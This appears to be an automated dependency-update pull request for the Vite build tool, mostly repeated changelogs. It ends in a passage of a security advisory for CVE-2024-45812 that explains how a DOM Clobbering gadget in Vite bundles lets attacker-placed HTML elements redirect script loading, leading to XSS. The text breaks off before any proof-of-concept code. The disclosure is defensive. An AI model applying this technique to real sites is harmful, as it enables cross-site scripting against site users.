getModulesByFile should return a serverModule (#18715) (b80d5ec)
catch error in full reload handler (#18713) (a10e741)
client: overlay not appearing when multiple vite clients were loaded (#18647) (27d70b5)
deps: update all non-major dependencies (#18691) (f005461)
deps: update dependency dotenv-expand to v12 (#18697) (0c658de)
display pre-transform error details (#18764) (554f45f)
exit code on SIGTERM (#18741) (cc55e36)
expose missing InterceptorOptions type (#18766) (6252c60)
html: fix inline proxy modules invalidation (#18696) (8ab04b7)
log error when send in module runner failed (#18753) (ba821bb)
module-runner: make evaluator optional (#18672) (fd1283f)
optimizer: detect npm / yarn / pnpm dependency changes correctly (#17336) (#18560) (818cf3e)
optimizer: trigger onCrawlEnd after manual included deps are registered (#18733) (dc60410)
optimizer: workaround firefox's false warning for no sources source map (#18665) (473424e)
ssr: replace __vite_ssr_identity__ with (0, ...) and inject ; between statements (#18748) (94546be)
cjs build for perEnvironmentState et al (#18656) (95c4b3c)
html: externalize rollup.external scripts correctly (#18618) (55461b4)
include more modules to prefix-only module list (#18667) (5a2103f)
ssr: format ssrTransform parse error (#18644) (d9be921)
ssr: preserve fetchModule error details (#18626) (866a433)
browser field should not be included by default for consumer: 'server' (#18575) (87b2347)
client: detect ws close correctly (#18548) (637d31b)
resolve: run ensureVersionQuery for SSR (#18591) (63207e5)
use server.perEnvironmentStartEndDuringDev (#18549) (fe30349)
allow nested dependency selector to be used for optimizeDeps.include for SSR (#18506) (826c81a)
asset new URL(,import.meta.url) match (#18194) (5286a90)
close watcher if it's disabled (#18521) (85bd0e9)
config: write temporary vite config to node_modules (#18509) (72eaef5)
css: cssCodeSplit uses the current environment configuration (#18486) (eefe895)
json: don't json.stringify arrays (#18541) (fa50b03)
less: prevent rebasing [@import](https://github.com/import) url(...) (#17857) (aec5fdd)
lib: only resolve css bundle name if have styles (#18530) (5d6dc49)
scss: improve error logs (#18522) (3194a6a)
define in environment config was not working (#18515) (052799e)
build: apply resolve.external/noExternal to server environments (#18495) (5a967cb)
config: remove error if require resolve to esm (#18437) (f886f75)
consider URLs with any protocol to be external (#17369) (a0336bd)
css: remove default import in ssr dev (#17922) (eccf663)
use picomatch to align with tinyglobby (#18503) (437795d)
css: cssCodeSplit in environments.xxx.build is invalid (#18464) (993e71c)
css: make sass types work with sass-embedded (#18459) (89f8303)
deps: update all non-major dependencies (#18484) (2ec12df)
handle warmup glob hang (#18462) (409fa5c)
manifest: non entry CSS chunk src was wrong (#18133) (c148676)
module-runner: delay function eval until module runner instantiation (#18480) (472afbd)
plugins: noop if config hook returns same config reference (#18467) (bd540d5)
return the same instance of ModuleNode for the same EnvironmentModuleNode (#18455) (5ead461)
set scripts imported by HTML moduleSideEffects=true (#18411) (2ebe4b4)
use websocket to test server liveness before client reload (#17891) (7f9f8c6)
add typing to CSSOptions.preprocessorOptions (#18001) (7eeb6f2)
default build.cssMinify to 'esbuild' for SSR (#15637) (f1d3bf7)
dev: prevent double URL encoding in server.open on macOS (#18443) (56b7176)
preview: set resolvedUrls null after close (#18445) (65014a3)
ssr: inject identity function at the top (#18449) (0ab20a3)
ssr: preserve source maps for hoisted imports (fix #16355) (#16356) (8e382a6)
augment hash for CSS files to prevent chromium erroring by loading previous files (#18367) (a569f42)
cli: --watch should not override build.watch options (#18390) (b2965c8)
css: don't transform sass function calls with namespace (#18414) (dbb2604)
deps: update open dependency to 10.1.0 (#18349) (5cca4bf)
deps: update all non-major dependencies (#18345) (5552583)
more robust plugin.sharedDuringBuild (#18351) (47b1270)
ssr: this in exported function should be undefined (#18329) (bae6a37)
worker: rewrite rollup output.format with worker.format on worker build error (#18165) (dc82334)
injectQuery double encoding (#18246) (2c5f948)
add position to import analysis resolve exception (#18344) (0fe95d4)
assets: make srcset parsing HTML spec compliant (#16323) (#18242) (0e6d4a5)
css: dont remove JS chunk for pure CSS chunk when the export is used (#18307) (889bfc0)
deps: bump tsconfck (#18322) (67783b2)
deps: update all non-major dependencies (#18292) (5cac054)
destroy the runner when runnable environment is closed (#18282) (5212d09)
handle yarn command fail when root does not exist (#18141) (460aaff)
hmr: don't try to rewrite imports for direct CSS soft invalidation (#18252) (a03bb0e)
make it easier to configure environment runner (#18273) (fb35a78)
middleware-mode: call all hot.listen when server restart (#18261) (007773b)
optimizer: don't externalize transitive dep package name with asset extension (#18152) (fafc7e2)
resolve: fix resolve cache key for external conditions (#18332) (93d286c)
resolve: fix resolve cache to consider conditions and more (#18302) (2017a33)
types: add more overload to defineConfig (#18299) (94e34cf)
asset import should skip handling data URIs (#18163) (70813c7)
cache the runnable environment module runner (#18215) (95020ab)
call this.hot.close for non-ws HotChannel (#18212) (bad0ccc)
close HotChannel on environment close (#18206) (2d148e3)
config: treat all files as ESM on deno (#18081) (c1ed8a5)
css: ensure sass compiler initialized only once (#18128) (4cc5322)
css: fix lightningcss dep url resolution with custom root (#18125) (eb08f60)
css: fix missing source file warning with sass modern api custom importer (#18113) (d7763a5)
data-uri: only match ids starting with data: (#18241) (ec0efe8)
deps: update all non-major dependencies (#18170) (c8aea5a)
deps: upgrade rollup 4.22.4+ to ensure avoiding XSS (#18180) (ea1d0b9)
html: make build-html plugin work with sharedPlugins (#18214) (34041b9)
mixedModuleGraph: handle undefined id in getModulesByFile (#18201) (768a50f)
optimizer: re-optimize when changing config webCompatible (#18221) (a44b0a2)
require serialization for HMRConnection.send on implementation side (#18186) (9470011)
ssr: fix source map remapping with multiple sources (#18150) (e003a2c)
use config.consumer instead of options?.ssr / config.build.ssr (#18140) (21ec1ce)
vite: refactor "module cache" to "evaluated modules", pass down module to "runInlinedModule" (#18092) (e83beff)
avoid DOM Clobbering gadget in getRelativeUrlFromDocument (#18115) (ade1d89)
fs raw query (#18112) (9d2413c)
preload: throw error preloading module as well (#18098) (ba56cf4)
allow scanning exports from script module in svelte (#18063) (7d699aa)
build: declare preload-helper has no side effects (#18057) (587ad7b)
css: fallback to mainthread if logger or pkgImporter option is set for sass (#18071) (d81dc59)
dynamicImportVars: correct glob pattern for paths with parentheses (#17940) (2a391a7)
ensure req.url matches moduleByEtag URL to avoid incorrect 304 (#17997) (abf04c3)
html: escape html attribute (#18067) (5983f36)
incorrect environment consumer option resolution (#18079) (0e3467e)
preload: allow ignoring dep errors (#18046) (3fb2889)
store backwards compatible ssrModule and ssrError (#18031) (cf8ced5)

Performance Improvements

reduce bundle size for Object.keys(import.meta.glob(...)) / Object.values(import.meta.glob(...)) (#18666) (ed99a2c)
worker: inline worker without base64 (#18752) (90c66c9)
remove strip-ansi for a node built-in (#18630) (5182272)
css: skip style.css extraction if code-split css (#18470) (34fdb6b)
call module.enableCompileCache() (#18323) (18f1dad)
use crypto.hash when available (#18317) (2a14884)

Documentation

rename HotUpdateContext to HotUpdateOptions (#18718) (824c347)
add jsdocs to flags in BuilderOptions (#18516) (1507068)
missing changes guides (#18491) (5da78a6)
update fs.deny default in JSDoc (#18514) (1fcc83d)
update homepage (#18274) (a99a0aa)
fix typo in proxy.ts (#18162) (49087bd)

Reverts

use chokidar v3 (#18659) (49783da)

Miscellaneous Chores

add 5.4.x changelogs (#18768) (26b58c8)
add some comments about mimes (#18705) (f07e9b9)
deps: update all non-major dependencies (#18746) (0ad16e9)
deps: update all non-major dependencies (#18634) (e2231a9)
deps: update transitive deps (#18602) (0c8b152)
tweak build config (#18622) (2a88f71)
add warning for / mapping in resolve.alias (#18588) (a51c254)
deps: update all non-major dependencies (#18562) (fb227ec)
remove unused ssr variable (#18594) (23c39fc)
fix moduleSideEffects in build script on Windows (#18518) (25fe9e3)
use premove instead of rimraf (#18499) (f97a578)
deps: update postcss-load-config to v6 (#15235) (3a27f62)
deps: update dependency picomatch to v4 (#15876) (3774881)
combine deps license with same text (#18356) (b5d1a05)
create-vite: mark template files as CC0 (#18366) (f6b9074)
deps: bump TypeScript to 5.6 (#18254) (57a0e85)
deps: migrate fast-glob to tinyglobby (#18243) (6f74a3a)
deps: update all non-major dependencies (#18404) (802839d)
deps: update dependency sirv to v3 (#18346) (5ea4b00)
fix grammar (#18385) (8030231)
mark builder api experimental (#18436) (b57321c)
tiny typo (#18374) (7d97a9b)
update moduleResolution value casing (#18409) (ff018dc)
deps: update dependency @rollup/plugin-commonjs to v28 (#18231) (78e749e)
point deprecation error URLs to main branch docs (#18321) (11c0fb1)
update all url references of vitejs.dev to vite.dev (#18276) (7052c8f)
update built LICENSE (69b6764)
update license copyright (#18278) (56eb869)
deps: update all non-major dependencies (#18108) (a73bbaa)
deps: update all non-major dependencies (#18230) (c0edd26)
deps: update esbuild (#18173) (e59e2ca)
escape template tag in CHANGELOG.md (#18126) (caaa683)
optimizer: fix typo in comment (#18239) (b916ab6)
deps: update all non-major dependencies (#18050) (7cac03f)
enable some eslint rules (#18084) (e9a2746)
remove npm-run-all2 (#18083) (41180d0)
silence unnecessary logs during test (#18052) (a3ef052)

Code Refactoring

first character judgment replacement regexp (#18658) (58f1df3)
introduce mergeWithDefaults and organize how default values for config options are set (#18550) (0e1f437)
resolve: remove allowLinkedExternal parameter from tryNodeResolve (#18670) (b74d363)
resolve: remove environmentsOptions parameter (#18590) (3ef0bf1)
client-only top-level warmup (#18524) (a50ff60)
remove fs.cachedChecks option (#18493) (94b0857)
separate tsconfck caches per config in a weakmap (#17317) (b9b01d5)
css: hide internal preprocessor types and expose types used for options (#18458) (c32837c)
optimizeDeps back to top level (#18465) (1ac22de)
top-level createEnvironment is client-only (#18475) (6022fc2)
use originalFileNames/names (#18240) (f2957c8)
bump minimal terser version to 5.16.0 (#18209) (19ce525)
resolve: remove tryEsmOnly flag (#18394) (7cebe38)
use builder in build (#18432) (cc61d16)
rename runner.destroy() to runner.close() (#18304) (cd368f9)
break circular dependencies to fix test-unit (#18237) (a577828)
remove _onCrawlEnd (#18207) (bea0272)
remove the need for "processSourceMap" (#18187) (08ff233)
replace parse with splitFileAndPostfix (#18185) (6f030ec)
use resolvePackageData to get rollup version (#18208) (220d6ec)
create-vite: use picocolors (#18085) (ba37df0)
remove custom resolveOptions from pre-alias plugin (#18041) (6f60adc)
remove unnecessary escape (#18044) (8062d36)

Build System

ignore cjs warning (#18660) (33b0d5a)
reduce package size (#18517) (b83f60b)

Tests

simplify playground/json/__tests__/ssr (#18701) (f731ca2)
update filename regex (#18593) (dd25c1a)
fix test conflict (#18446) (94cd1e6)
remove unnecessary logs from output (#18368) (f50d358)
replace fs mocking in css module compose test (#18413) (ddee0ad)
ssr external / resolveId test (#18327) (4c5cf91)
test optimized dep as ssr entry (#18301) (466f94a)
fix server-worker-runner flaky test (#18247) (8f82730)
move glob test root to reduce snapshot change (#18053) (04d7e77)

Beta Changelogs

6.0.0-beta.10 (2024-11-14)

See 6.0.0-beta.10 changelog

6.0.0-beta.9 (2024-11-07)

See 6.0.0-beta.9 changelog

6.0.0-beta.8 (2024-11-01)

See 6.0.0-beta.8 changelog

6.0.0-beta.7 (2024-10-30)

See 6.0.0-beta.7 changelog

6.0.0-beta.6 (2024-10-28)

See 6.0.0-beta.6 changelog

6.0.0-beta.5 (2024-10-24)

See 6.0.0-beta.5 changelog

6.0.0-beta.4 (2024-10-23)

See 6.0.0-beta.4 changelog

6.0.0-beta.3 (2024-10-15)

See 6.0.0-beta.3 changelog

6.0.0-beta.2 (2024-10-01)

See 6.0.0-beta.2 changelog

6.0.0-beta.1 (2024-09-16)

See 6.0.0-beta.1 changelog

6.0.0-beta.0 (2024-09-12)

See 6.0.0-beta.0 changelog

`v5.4.10`

Compare Source

Please refer to CHANGELOG.md for details.

`v5.4.9`

Compare Source

Please refer to CHANGELOG.md for details.

`v5.4.8`

Compare Source

Please refer to CHANGELOG.md for details.

`v5.4.7`

Compare Source

Please refer to CHANGELOG.md for details.

`v5.4.6`

Compare Source

Please refer to CHANGELOG.md for details.

`v5.4.5`

Compare Source

Please refer to CHANGELOG.md for details.

`v5.4.4`

Compare Source

Please refer to CHANGELOG.md for details.

`v5.4.3`

Compare Source

Please refer to CHANGELOG.md for details.

`v5.4.2`

Compare Source

Please refer to CHANGELOG.md for details.

`v5.4.1`

Compare Source

Today, we're taking another big step in Vite's story. The Vite team, contributors, and ecosystem partners are excited to announce the release of the next Vite major:

Vite 6.0 announcement blog post
Docs
Translations: 简体中文, 日本語, Español, Português, 한국어, Deutsch
Migration Guide

⚠ BREAKING CHANGES

drop node 21 support in version ranges (#18729) (a384d8f)
deps: update dependency dotenv-expand to v12 (#18697) (0c658de)
resolve: allow removing conditions (#18395) (d002e7d)
html: support more asset sources (#11138) (8a7af50)
remove fs.cachedChecks option (#18493) (94b0857)
proxy bypass with WebSocket (#18070) (3c9836d)
css: remove default import in ssr dev (#17922) (eccf663)
lib: use package name for css output file name (#18488) (61cbf6f)
update to chokidar v4 (#18453) (192d555)
support file:// resolution (#18422) (6a7e313)
deps: update postcss-load-config to v6 (#15235) (3a27f62)
css: change default sass api to modern/modern-compiler (#17937) (d4e0442)
css: load postcss config within workspace root only (#18440) (d23a493)
default build.cssMinify to 'esbuild' for SSR (#15637) (f1d3bf7)
json: add json.stringify: 'auto' and make that the default (#18303) (b80daa7)
bump minimal terser version to 5.16.0 (#18209) (19ce525)
deps: migrate fast-glob to tinyglobby (#18243) (6f74a3a)

Features

add support for .cur type (#18680) (5ec9eed)
drop node 21 support in version ranges (#18729) (a384d8f)
enable HMR by default on ModuleRunner side (#18749) (4d2abc7)
support module-sync condition when loading config if enabled (#18650) (cf5028d)
add isSsrTargetWebWorker flag to configEnvironment hook (#18620) (3f5fab0)
add ssr.resolve.mainFields option (#18646) (a6f5f5b)
expose default mainFields/conditions (#18648) (c12c653)
extended applyToEnvironment and perEnvironmentPlugin (#18544) (8fa70cd)
optimizer: allow users to specify their esbuild platform option (#18611) (0924879)
show error when accessing variables not exposed in CJS build (#18649) (87c5502)
asset: add ?inline and ?no-inline queries to control inlining (#15454) (9162172)
asset: inline svg in dev if within limit (#18581) (f08b146)
use a single transport for fetchModule and HMR support (#18362) (78dc490)
html: support more asset sources (#11138) (8a7af50)
resolve: allow removing conditions (#18395) (d002e7d)
html: support vite-ignore attribute to opt-out of processing (#18494) (d951310)
lib: use package name for css output file name (#18488) (61cbf6f)
log complete config in debug mode (#18289) (04f6736)
proxy bypass with WebSocket (#18070) (3c9836d)
support file:// resolution (#18422) (6a7e313)
update to chokidar v4 (#18453) (192d555)
allow custom console in createLogger (#18379) (0c497d9)
css: add more stricter typing of lightningcss (#18460) (b9b925e)
css: change default sass api to modern/modern-compiler (#17937) (d4e0442)
read sec-fetch-dest header to detect JS in transform (#9981) (e51dc40)
css: load postcss config within workspace root only (#18440) (d23a493)
json: add json.stringify: 'auto' and make that the default (#18303) (b80daa7)
add .git to deny list by default (#18382) (105ca12)
add environment::listen (#18263) (4d5f51d)
enable dependencies discovery and pre-bundling in ssr environments (#18358) (9b21f69)
restrict characters useable for environment name (#18255) (9ab6180)
support arbitrary module namespace identifier imports from cjs deps (#18236) (4389a91)
introduce RunnableDevEnvironment (#18190) (fb292f2)
support this.environment in options and onLog hook (#18142) (7722c06)
css: support es2023 build target for lightningcss (#17998) (1a76300)
Environment API (#16471) (242f550)
expose EnvironmentOptions type (#18080) (35cf59c)

Bug Fixes

createRunnableDevEnvironment returns RunnableDevEnvironment, not DevEnvironment (#18673) (74221c3)
getModulesByFile should return a serverModule (#18715) (b80d5ec)
catch error in full reload handler (#18713) (a10e741)
client: overlay not appearing when multiple vite clients were loaded (#18647) (27d70b5)
deps: update all non-major dependencies (#18691) (f005461)
deps: update dependency dotenv-expand to v12 (#18697) (0c658de)
display pre-transform error details (#18764) (554f45f)
exit code on SIGTERM (#18741) (cc55e36)
expose missing InterceptorOptions type (#18766) (6252c60)
html: fix inline proxy modules invalidation (#18696) (8ab04b7)
log error when send in module runner failed (#18753) (ba821bb)
module-runner: make evaluator optional (#18672) (fd1283f)
optimizer: detect npm / yarn / pnpm dependency changes correctly (#17336) (#18560) (818cf3e)
optimizer: trigger onCrawlEnd after manual included deps are registered (#18733) (dc60410)
optimizer: workaround firefox's false warning for no sources source map (#18665) (473424e)
ssr: replace __vite_ssr_identity__ with (0, ...) and inject ; between statements (#18748) (94546be)
cjs build for perEnvironmentState et al (#18656) (95c4b3c)
html: externalize rollup.external scripts correctly (#18618) (55461b4)
include more modules to prefix-only module list (#18667) (5a2103f)
ssr: format ssrTransform parse error (#18644) (d9be921)
ssr: preserve fetchModule error details (#18626) (866a433)
browser field should not be included by default for consumer: 'server' (#18575) (87b2347)
client: detect ws close correctly (#18548) (637d31b)
resolve: run ensureVersionQuery for SSR (#18591) (63207e5)
use server.perEnvironmentStartEndDuringDev (#18549) (fe30349)
allow nested dependency selector to be used for optimizeDeps.include for SSR (#18506) (826c81a)
asset new URL(,import.meta.url) match (#18194) (5286a90)
close watcher if it's disabled (#18521) (85bd0e9)
config: write temporary vite config to node_modules (#18509) (72eaef5)
css: cssCodeSplit uses the current environment configuration (#18486) (eefe895)
json: don't json.stringify arrays (#18541) (fa50b03)
less: prevent rebasing [@import](https://github.com/import) url(...) (#17857) (aec5fdd)
lib: only resolve css bundle name if have styles (#18530) (5d6dc49)
scss: improve error logs (#18522) (3194a6a)
define in environment config was not working (#18515) (052799e)
build: apply resolve.external/noExternal to server environments (#18495) (5a967cb)
config: remove error if require resolve to esm (#18437) (f886f75)
consider URLs with any protocol to be external (#17369) (a0336bd)
css: remove default import in ssr dev (#17922) (eccf663)
use picomatch to align with tinyglobby (#18503) (437795d)
css: cssCodeSplit in environments.xxx.build is invalid (#18464) (993e71c)
css: make sass types work with sass-embedded (#18459) (89f8303)
deps: update all non-major dependencies (#18484) (2ec12df)
handle warmup glob hang (#18462) (409fa5c)
manifest: non entry CSS chunk src was wrong (#18133) (c148676)
module-runner: delay function eval until module runner instantiation (#18480) (472afbd)
plugins: noop if config hook returns same config reference (#18467) (bd540d5)
return the same instance of ModuleNode for the same EnvironmentModuleNode (#18455) (5ead461)
set scripts imported by HTML moduleSideEffects=true (#18411) (2ebe4b4)
use websocket to test server liveness before client reload (#17891) (7f9f8c6)
add typing to CSSOptions.preprocessorOptions (#18001) (7eeb6f2)
default build.cssMinify to 'esbuild' for SSR (#15637) (f1d3bf7)
dev: prevent double URL encoding in server.open on macOS (#18443) (56b7176)
preview: set resolvedUrls null after close (#18445) (65014a3)
ssr: inject identity function at the top (#18449) (0ab20a3)
ssr: preserve source maps for hoisted imports (fix #16355) (#16356) (8e382a6)
augment hash for CSS files to prevent chromium erroring by loading previous files (#18367) (a569f42)
cli: --watch should not override build.watch options (#18390) (b2965c8)
css: don't transform sass function calls with namespace (#18414) (dbb2604)
deps: update open dependency to 10.1.0 (#18349) (5cca4bf)
deps: update all non-major dependencies (#18345) (5552583)
more robust plugin.sharedDuringBuild (#18351) (47b1270)
ssr: this in exported function should be undefined (#18329) (bae6a37)
worker: rewrite rollup output.format with worker.format on worker build error (#18165) (dc82334)
injectQuery double encoding (#18246) (2c5f948)
add position to import analysis resolve exception (#18344) (0fe95d4)
assets: make srcset parsing HTML spec compliant (#16323) (#18242) (0e6d4a5)
css: dont remove JS chunk for pure CSS chunk when the export is used (#18307) (889bfc0)
deps: bump tsconfck (#18322) (67783b2)
deps: update all non-major dependencies (#18292) (5cac054)
destroy the runner when runnable environment is closed (#18282) (5212d09)
handle yarn command fail when root does not exist (#18141) (460aaff)
hmr: don't try to rewrite imports for direct CSS soft invalidation (#18252) (a03bb0e)
make it easier to configure environment runner (#18273) (fb35a78)
middleware-mode: call all hot.listen when server restart (#18261) (007773b)
optimizer: don't externalize transitive dep package name with asset extension (#18152) (fafc7e2)
resolve: fix resolve cache key for external conditions (#18332) (93d286c)
resolve: fix resolve cache to consider conditions and more (#18302) (2017a33)
types: add more overload to defineConfig (#18299) (94e34cf)
asset import should skip handling data URIs (#18163) (70813c7)
cache the runnable environment module runner (#18215) (95020ab)
call this.hot.close for non-ws HotChannel (#18212) (bad0ccc)
close HotChannel on environment close (#18206) (2d148e3)
config: treat all files as ESM on deno (#18081) (c1ed8a5)
css: ensure sass compiler initialized only once (#18128) (4cc5322)
css: fix lightningcss dep url resolution with custom root (#18125) (eb08f60)
css: fix missing source file warning with sass modern api custom importer (#18113) (d7763a5)
data-uri: only match ids starting with data: (#18241) (ec0efe8)
deps: update all non-major dependencies (#18170) (c8aea5a)
deps: upgrade rollup 4.22.4+ to ensure avoiding XSS (#18180) (ea1d0b9)
html: make build-html plugin work with sharedPlugins (#18214) (34041b9)
mixedModuleGraph: handle undefined id in getModulesByFile (#18201) (768a50f)
optimizer: re-optimize when changing config webCompatible (#18221) (a44b0a2)
require serialization for HMRConnection.send on implementation side (#18186) (9470011)
ssr: fix source map remapping with multiple sources (#18150) (e003a2c)
use config.consumer instead of options?.ssr / config.build.ssr (#18140) (21ec1ce)
vite: refactor "module cache" to "evaluated modules", pass down module to "runInlinedModule" (#18092) (e83beff)
avoid DOM Clobbering gadget in getRelativeUrlFromDocument (#18115) (ade1d89)
fs raw query (#18112) (9d2413c)
preload: throw error preloading module as well (#18098) (ba56cf4)
allow scanning exports from script module in svelte (#18063) (7d699aa)
build: declare preload-helper has no side effects (#18057) (587ad7b)
css: fallback to mainthread if logger or pkgImporter option is set for sass (#18071) (d81dc59)
dynamicImportVars: correct glob pattern for paths with parentheses (#17940) (2a391a7)
ensure req.url matches moduleByEtag URL to avoid incorrect 304 (#17997) (abf04c3)
html: escape html attribute (#18067) (5983f36)
incorrect environment consumer option resolution (#18079) (0e3467e)
preload: allow ignoring dep errors (#18046) (3fb2889)
store backwards compatible ssrModule and ssrError (#18031) (cf8ced5)

Performance Improvements

reduce bundle size for Object.keys(import.meta.glob(...)) / Object.values(import.meta.glob(...)) (#18666) (ed99a2c)
worker: inline worker without base64 (#18752) (90c66c9)
remove strip-ansi for a node built-in (#18630) (5182272)
css: skip style.css extraction if code-split css (#18470) (34fdb6b)
call module.enableCompileCache() (#18323) (18f1dad)
use crypto.hash when available (#18317) (2a14884)

Documentation

rename HotUpdateContext to HotUpdateOptions (#18718) (824c347)
add jsdocs to flags in BuilderOptions (#18516) (1507068)
missing changes guides (#18491) (5da78a6)
update fs.deny default in JSDoc (#18514) (1fcc83d)
update homepage (#18274) (a99a0aa)
fix typo in proxy.ts (#18162) (49087bd)

Reverts

use chokidar v3 (#18659) (49783da)

Miscellaneous Chores

add 5.4.x changelogs (#18768) (26b58c8)
add some comments about mimes (#18705) (f07e9b9)
deps: update all non-major dependencies (#18746) (0ad16e9)
deps: update all non-major dependencies (#18634) (e2231a9)
deps: update transitive deps (#18602) (0c8b152)
tweak build config (#18622) (2a88f71)
add warning for / mapping in resolve.alias (#18588) (a51c254)
deps: update all non-major dependencies (#18562) (fb227ec)
remove unused ssr variable (#18594) (23c39fc)
fix moduleSideEffects in build script on Windows (#18518) (25fe9e3)
use premove instead of rimraf (#18499) (f97a578)
deps: update postcss-load-config to v6 (#15235) (3a27f62)
deps: update dependency picomatch to v4 (#15876) (3774881)
combine deps license with same text (#18356) (b5d1a05)
create-vite: mark template files as CC0 (#18366) (f6b9074)
deps: bump TypeScript to 5.6 (#18254) (57a0e85)
deps: migrate fast-glob to tinyglobby (#18243) (6f74a3a)
deps: update all non-major dependencies (#18404) (802839d)
deps: update dependency sirv to v3 (#18346) (5ea4b00)
fix grammar (#18385) (8030231)
mark builder api experimental (#18436) (b57321c)
tiny typo (#18374) (7d97a9b)
update moduleResolution value casing (#18409) (ff018dc)
deps: update dependency @rollup/plugin-commonjs to v28 (#18231) (78e749e)
point deprecation error URLs to main branch docs (#18321) (11c0fb1)
update all url references of vitejs.dev to vite.dev (#18276) (7052c8f)
update built LICENSE (69b6764)
update license copyright (#18278) (56eb869)
deps: update all non-major dependencies (#18108) (a73bbaa)
deps: update all non-major dependencies (#18230) (c0edd26)
deps: update esbuild (#18173) (e59e2ca)
escape template tag in CHANGELOG.md (#18126) (caaa683)
optimizer: fix typo in comment (#18239) (b916ab6)
deps: update all non-major dependencies (#18050) (7cac03f)
enable some eslint rules (#18084) (e9a2746)
remove npm-run-all2 (#18083) (41180d0)
silence unnecessary logs during test (#18052) (a3ef052)

Code Refactoring

first character judgment replacement regexp (#18658) (58f1df3)
introduce mergeWithDefaults and organize how default values for config options are set (#18550) (0e1f437)
resolve: remove allowLinkedExternal parameter from tryNodeResolve (#18670) (b74d363)
resolve: remove environmentsOptions parameter (#18590) (3ef0bf1)
client-only top-level warmup (#18524) (a50ff60)
remove fs.cachedChecks option (#18493) (94b0857)
separate tsconfck caches per config in a weakmap (#17317) (b9b01d5)
css: hide internal preprocessor types and expose types used for options (#18458) (c32837c)
optimizeDeps back to top level (#18465) (1ac22de)
top-level createEnvironment is client-only (#18475) (6022fc2)
use originalFileNames/names (#18240) (f2957c8)
bump minimal terser version to 5.16.0 (#18209) (19ce525)
resolve: remove tryEsmOnly flag (#18394) (7cebe38)
use builder in build (#18432) (cc61d16)
rename runner.destroy() to runner.close() (#18304) (cd368f9)
break circular dependencies to fix test-unit (#18237) (a577828)
remove _onCrawlEnd (#18207) (bea0272)
remove the need for "processSourceMap" (#18187) (08ff233)
replace parse with splitFileAndPostfix (#18185) (6f030ec)
use resolvePackageData to get rollup version (#18208) (220d6ec)
create-vite: use picocolors (#18085) (ba37df0)
remove custom resolveOptions from pre-alias plugin (#18041) (6f60adc)
remove unnecessary escape (#18044) (8062d36)

Build System

ignore cjs warning (#18660) (33b0d5a)
reduce package size (#18517) (b83f60b)

Tests

simplify playground/json/__tests__/ssr (#18701) (f731ca2)
update filename regex (#18593) (dd25c1a)
fix test conflict (#18446) (94cd1e6)
remove unnecessary logs from output (#18368) (f50d358)
replace fs mocking in css module compose test (#18413) (ddee0ad)
ssr external / resolveId test (#18327) (4c5cf91)
test optimized dep as ssr entry (#18301) (466f94a)
fix server-worker-runner flaky test (#18247) (8f82730)
move glob test root to reduce snapshot change (#18053) (04d7e77)

Beta Changelogs

6.0.0-beta.10 (2024-11-14)

See 6.0.0-beta.10 changelog

6.0.0-beta.9 (2024-11-07)

See 6.0.0-beta.9 changelog

6.0.0-beta.8 (2024-11-01)

See 6.0.0-beta.8 changelog

6.0.0-beta.7 (2024-10-30)

See 6.0.0-beta.7 changelog

6.0.0-beta.6 (2024-10-28)

See 6.0.0-beta.6 changelog

6.0.0-beta.5 (2024-10-24)

See 6.0.0-beta.5 changelog

6.0.0-beta.4 (2024-10-23)

See 6.0.0-beta.4 changelog

6.0.0-beta.3 (2024-10-15)

See 6.0.0-beta.3 changelog

6.0.0-beta.2 (2024-10-01)

See 6.0.0-beta.2 changelog

6.0.0-beta.1 (2024-09-16)

See 6.0.0-beta.1 changelog

6.0.0-beta.0 (2024-09-12)

See 6.0.0-beta.0 changelog

`v5.4.0`

Compare Source

Please refer to CHANGELOG.md for details.

`v5.3.6`

Compare Source

Please refer to CHANGELOG.md for details.

`v5.3.5`

Compare Source

See 5.3.5 changelog

`v5.3.4`

Compare Source

Please refer to CHANGELOG.md for details.

`v5.3.3`

Compare Source

Please refer to CHANGELOG.md for details.

`v5.3.2`

Compare Source

Please refer to CHANGELOG.md for details.

`v5.3.1`

Compare Source

Please refer to CHANGELOG.md for details.

`v5.3.0`

Compare Source

Please refer to CHANGELOG.md for details.

`v5.2.14`

Compare Source

Please refer to CHANGELOG.md for details.

Configuration

📅 Schedule: (UTC)

Branch creation
- ""
Automerge
- At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

If you want to rebase/retry this PR, check this box

This PR has been generated by Mend Renovate.

This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [vite](https://vite.dev) ([source](https://github.com/vitejs/vite/tree/HEAD/packages/vite)) | [`^5.0.8` → `^6.0.0`](https://renovatebot.com/diffs/npm/vite/5.2.13/6.4.2) | ![age](https://developer.mend.io/api/mc/badges/age/npm/vite/6.4.2?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/vite/5.2.13/6.4.2?slim=true) | --- ### Vite DOM Clobbering gadget found in vite bundled scripts that leads to XSS [CVE-2024-45812](https://nvd.nist.gov/vuln/detail/CVE-2024-45812) / [GHSA-64vr-g452-qvp3](https://github.com/advisories/GHSA-64vr-g452-qvp3) <details> <summary>More information</summary> #### Details ##### Summary We discovered a DOM Clobbering vulnerability in Vite when building scripts to `cjs`/`iife`/`umd` output format. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present. Note that, we have identified similar security issues in Webpack: https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986 ##### Details **Backgrounds** DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references: [1] https://scnps.co/papers/sp23_domclob.pdf [2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/ **Gadgets found in Vite** We have identified a DOM Clobbering vulnerability in Vite bundled scripts, particularly when the scripts dynamically import other scripts from the assets folder and the developer sets the build output format to `cjs`, `iife`, or `umd`. In such cases, Vite replaces relative paths starting with `__VITE_ASSET__` using the URL retrieved from `document.currentScript`. However, this implementation is vulnerable to a DOM Clobbering attack. The `document.currentScript` lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server. ``` const 